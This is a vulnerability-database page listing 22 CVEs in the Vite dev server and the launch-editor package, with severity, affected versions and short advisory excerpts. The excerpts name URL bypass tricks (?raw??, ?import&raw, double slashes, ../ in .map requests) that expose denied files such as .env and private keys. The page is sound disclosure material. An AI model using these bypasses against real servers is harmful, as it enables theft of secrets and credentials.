cbcvebase.

Vitejs Vite vulnerabilities

22 known vulnerabilities affecting vitejs/vite.

Total CVEs
22
CISA KEV
1
actively exploited
Public exploits
12
Exploited in wild
3
Severity breakdown
HIGH8MEDIUM14

Vulnerabilities

Page 1 of 2
CVE-2025-31125P1HIGHCVSS 7.5KEVPoCfixed in 4.5.11≥ 5.0.0, < 5.4.16+7 more2025-03-31
CVE-2025-31125 [HIGH] CWE-200 CVE-2025-31125: Vite is a frontend tooling framework for javascript. Vite exposes content of non-allowed files using Vite is a frontend tooling framework for javascript. Vite exposes content of non-allowed files using ?inline&import or ?raw?import. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. This vulnerability is fixed in 6.2.4, 6.1.3, 6.0.13, 5.4.16, and 4.5.11.
ghsanvdosv
CVE-2025-30208P1HIGHCVSS 7.5ExploitedPoCfixed in 4.5.10≥ 5.0.0, < 5.4.15+7 more2025-03-24
CVE-2025-30208 [HIGH] CWE-200 CVE-2025-30208: Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6. Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separ
ghsanvdosv
CVE-2026-39365P1MEDIUMCVSS 5.3ExploitedPoC≥ 6.0.0, ≤ 6.4.1≥ 7.0.0, ≤ 7.3.1+4 more2026-04-07
CVE-2026-39365 [MEDIUM] CWE-22 CVE-2026-39365: Vite is a frontend tooling framework for JavaScript. From 6.0.0 to before 6.4.2, 7.3.2, and 8.0.5, t Vite is a frontend tooling framework for JavaScript. From 6.0.0 to before 6.4.2, 7.3.2, and 8.0.5, the dev server’s handling of .map requests for optimized dependencies resolves file paths and calls readFile without restricting ../ segments in the URL. As a result, it is possible to bypass the server.fs.strict allow list and retrieve .map files locat
ghsanvdosv
CVE-2026-39363P2HIGHCVSS 7.5PoC≥ 6.0.0, ≤ 6.4.1≥ 7.0.0, ≤ 7.3.1+4 more2026-04-07
CVE-2026-39363 [HIGH] CWE-200 CVE-2026-39363: Vite is a frontend tooling framework for JavaScript. From 6.0.0 to before 6.4.2, 7.3.2, and 8.0.5, i Vite is a frontend tooling framework for JavaScript. From 6.0.0 to before 6.4.2, 7.3.2, and 8.0.5, if it is possible to connect to the Vite dev server’s WebSocket without an Origin header, an attacker can invoke fetchModule via the custom WebSocket event vite:invoke and combine file://... with ?raw (or ?inline) to retrieve the contents of arbitrary fi
ghsanvdosv
CVE-2023-34092P2HIGHCVSS 7.5PoC≥ 3.0.2, < 3.2.7≥ 4.0.0, < 4.0.5+8 more2023-06-01
CVE-2023-34092 [HIGH] CWE-50 CVE-2023-34092: Vite provides frontend tooling. Prior to versions 2.9.16, 3.2.7, 4.0.5, 4.1.5, 4.2.3, and 4.3.9, Vit Vite provides frontend tooling. Prior to versions 2.9.16, 3.2.7, 4.0.5, 4.1.5, 4.2.3, and 4.3.9, Vite Server Options (`server.fs.deny`) can be bypassed using double forward-slash (//) allows any unauthenticated user to read file from the Vite root-path of the application including the default `fs.deny` settings (`['.env', '.env.*', '*.{crt,pem}']`). On
ghsanvdosv
CVE-2025-31486P3MEDIUMCVSS 5.3PoCfixed in 4.5.12v>=5.0.0, < 5.4.17+3 more2025-04-03
CVE-2025-31486 [MEDIUM] CWE-200 CVE-2025-31486: Vite is a frontend tooling framework for javascript. The contents of arbitrary files can be returned Vite is a frontend tooling framework for javascript. The contents of arbitrary files can be returned to the browser. By adding ?.svg with ?.wasm?init or with sec-fetch-dest: script header, the server.fs.deny restriction was able to bypass. This bypass is only possible if the file is smaller than build.assetsInlineLimit (default: 4kB) and when using
ghsanvdosv
CVE-2026-39364P3HIGHCVSS 7.5PoC≥ 7.0.0, ≤ 7.3.1≥ 8.0.0, ≤ 8.0.4+2 more2026-04-07
CVE-2026-39364 [HIGH] CWE-180 CVE-2026-39364: Vite is a frontend tooling framework for JavaScript. From 7.1.0 to before 7.3.2 and 8.0.5, on the Vi Vite is a frontend tooling framework for JavaScript. From 7.1.0 to before 7.3.2 and 8.0.5, on the Vite dev server, files that should be blocked by server.fs.deny (e.g., .env, *.crt) can be retrieved with HTTP 200 responses when query parameters such as ?raw, ?import&raw, or ?import&url&inline are appended. This vulnerability is fixed in 7.3.2 and 8.0.
ghsanvdosv
CVE-2025-62522P3MEDIUMCVSS 6.0PoCv>= 7.1.0, < 7.1.11v>= 7.0.0, < 7.0.8+5 more2025-10-20
CVE-2025-62522 [MEDIUM] CWE-22 CVE-2025-62522: Vite is a frontend tooling framework for JavaScript. In versions from 2.9.18 to before 3.0.0, 3.2.9 Vite is a frontend tooling framework for JavaScript. In versions from 2.9.18 to before 3.0.0, 3.2.9 to before 4.0.0, 4.5.3 to before 5.0.0, 5.2.6 to before 5.4.21, 6.0.0 to before 6.4.1, 7.0.0 to before 7.0.8, and 7.1.0 to before 7.1.11, files denied by server.fs.deny were sent if the URL ended with \ when the dev server is running on Windows. Only ap
ghsanvdosv
CVE-2025-32395P3MEDIUMCVSS 6.0PoCv>= 6.2.0, < 6.2.6v>= 6.1.0, < 6.1.5+3 more2025-04-10
CVE-2025-32395 [MEDIUM] CWE-200 CVE-2025-32395: Vite is a frontend tooling framework for javascript. Prior to 6.2.6, 6.1.5, 6.0.15, 5.4.18, and 4.5. Vite is a frontend tooling framework for javascript. Prior to 6.2.6, 6.1.5, 6.0.15, 5.4.18, and 4.5.13, the contents of arbitrary files can be returned to the browser if the dev server is running on Node or Bun. HTTP 1.1 spec (RFC 9112) does not allow # in request-target. Although an attacker can send such a request. For those requests with an inval
ghsanvdosv
CVE-2025-58751P3MEDIUMCVSS 5.3PoCfixed in 5.4.20≥ 6.0.0, < 6.3.6+5 more2025-09-08
CVE-2025-58751 [MEDIUM] CWE-22 CVE-2025-58751: Vite is a frontend tooling framework for JavaScript. Prior to versions 7.1.5, 7.0.7, 6.3.6, and 5.4. Vite is a frontend tooling framework for JavaScript. Prior to versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20, files starting with the same name with the public directory were served bypassing the `server.fs` settings. Only apps that explicitly expose the Vite dev server to the network (using --host or `server.host` config option), use the public directory
ghsanvdosv
CVE-2023-49293P3MEDIUMCVSS 6.1PoC≥ 4.4.0, ≤ 4.4.11≥ 5.0.0, ≤ 5.0.4+4 more2023-12-04
CVE-2023-49293 [MEDIUM] CWE-79 CVE-2023-49293: Vite is a website frontend framework. When Vite's HTML transformation is invoked manually via `serve Vite is a website frontend framework. When Vite's HTML transformation is invoked manually via `server.transformIndexHtml`, the original request URL is passed in unmodified, and the `html` being transformed contains inline module scripts (`...`), it is possible to inject arbitrary HTML into the transformed output by supplying a malicious URL query str
ghsanvdosv
CVE-2025-46565P3MEDIUMCVSS 5.3PoCfixed in 4.5.14≥ 5.0.0, < 5.4.19+7 more2025-05-01
CVE-2025-46565 [MEDIUM] CWE-22 CVE-2025-46565: Vite is a frontend tooling framework for javascript. Prior to versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, Vite is a frontend tooling framework for javascript. Prior to versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14, the contents of files in the project root that are denied by a file matching pattern can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. O
ghsanvdosv
CVE-2024-52011P3HIGHCVSS 8.3fixed in 5.4.92026-06-01
CVE-2024-52011 [HIGH] CWE-77 CVE-2024-52011: launch-editor allows users to open files with line numbers in editor from Node.js. Prior to version launch-editor allows users to open files with line numbers in editor from Node.js. Prior to version 2.9.0, due to the insufficient sanitization of the `file` argument in the `launchEditor`, an attacker can execute arbitrary commands on Windows by supplying a filename that contains special characters. This issue has been fixed in the `launch-editor` vers
ghsanvd
CVE-2026-53571P3HIGHCVSS 7.5fixed in 6.4.3≥ 7.0.0, < 7.3.5+3 more2026-06-22
CVE-2026-53571 [HIGH] CWE-22 CVE-2026-53571: Vite is a frontend tooling framework for JavaScript. Prior to 8.0.16, 7.3.5, and 6.4.3, the contents Vite is a frontend tooling framework for JavaScript. Prior to 8.0.16, 7.3.5, and 6.4.3, the contents of files that are specified by server.fs.deny can be returned to the browser on Windows. Vite’s dev server denies direct access to sensitive files through server.fs.deny, including entries such as .env, .env.*, and *.{crt,pem}. However, on Windows, the
ghsanvd
CVE-2024-23331P3HIGHCVSS 7.5≥ 2.7.0, < 2.9.17≥ 3.0.0, < 3.2.8+2 more2024-01-19
CVE-2024-23331 [HIGH] CVE-2024-23331: Vite is a frontend tooling framework for javascript. The Vite dev server option `server.fs.deny` can Vite is a frontend tooling framework for javascript. The Vite dev server option `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows. This bypass is similar to CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems. Since `
ghsanvdosv
CVE-2026-53632P3MEDIUMCVSS 5.5v>= 8.0.0, < 8.0.16v>= 7.0.0, < 7.3.5+1 more2026-06-22
CVE-2026-53632 [MEDIUM] CWE-73 CVE-2026-53632: launch-editor allows users to open files with line numbers in editor from Node.js. Prior to 2.14.1, launch-editor allows users to open files with line numbers in editor from Node.js. Prior to 2.14.1, the launch-editor NPM package accesses arbitrary paths including Windows UNC paths. When a UNC path is opened, Windows automatically attempts NTLM authentication to the remote host, causing the user’s NTLMv2 password hash to be leaked to an attacker-con
ghsanvd
CVE-2024-45812P4MEDIUMCVSS 6.4v>= 5.4.0, < 5.4.6v>= 5.3.0, < 5.3.6+3 more2024-09-17
CVE-2024-45812 [MEDIUM] CWE-79 CVE-2024-45812: Vite a frontend build tooling framework for javascript. Affected versions of vite were discovered to Vite a frontend build tooling framework for javascript. Affected versions of vite were discovered to contain a DOM Clobbering vulnerability when building scripts to `cjs`/`iife`/`umd` output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an
ghsanvdosv
CVE-2025-24010P4MEDIUMCVSS 6.5fixed in 4.5.5≥ 5.0.0, < 5.4.12+4 more2025-01-20
CVE-2025-24010 [MEDIUM] CWE-346 CVE-2025-24010: Vite is a frontend tooling framework for javascript. Vite allowed any websites to send any requests Vite is a frontend tooling framework for javascript. Vite allowed any websites to send any requests to the development server and read the response due to default CORS settings and lack of validation on the Origin header for WebSocket connections. This vulnerability is fixed in 6.0.9, 5.4.12, and 4.5.6.
ghsanvdosv
CVE-2025-58752P4MEDIUMCVSS 5.3fixed in 5.4.20≥ 6.0.0, < 6.3.6+5 more2025-09-08
CVE-2025-58752 [MEDIUM] CWE-23 CVE-2025-58752: Vite is a frontend tooling framework for JavaScript. Prior to versions 7.1.5, 7.0.7, 6.3.6, and 5.4. Vite is a frontend tooling framework for JavaScript. Prior to versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20, any HTML files on the machine were served regardless of the `server.fs` settings. Only apps that explicitly expose the Vite dev server to the network (using --host or server.host config option) and use `appType: 'spa'` (default) or `appType: 'mpa'`
ghsanvdosv
CVE-2024-31207P4MEDIUMCVSS 5.9v>= 2.7.0, <= 2.9.17v>= 3.0.0, <= 3.2.8+4 more2024-04-04
CVE-2024-31207 [MEDIUM] CWE-200 CVE-2024-31207: Vite (French word for "quick", pronounced /vit/, like "veet") is a frontend build tooling to improve Vite (French word for "quick", pronounced /vit/, like "veet") is a frontend build tooling to improve the frontend development experience.`server.fs.deny` does not deny requests for patterns with directories. This vulnerability has been patched in version(s) 5.2.6, 5.1.7, 5.0.13, 4.5.3, 3.2.10 and 2.9.18.
ghsanvdosv
Vitejs Vite vulnerabilities | cvebase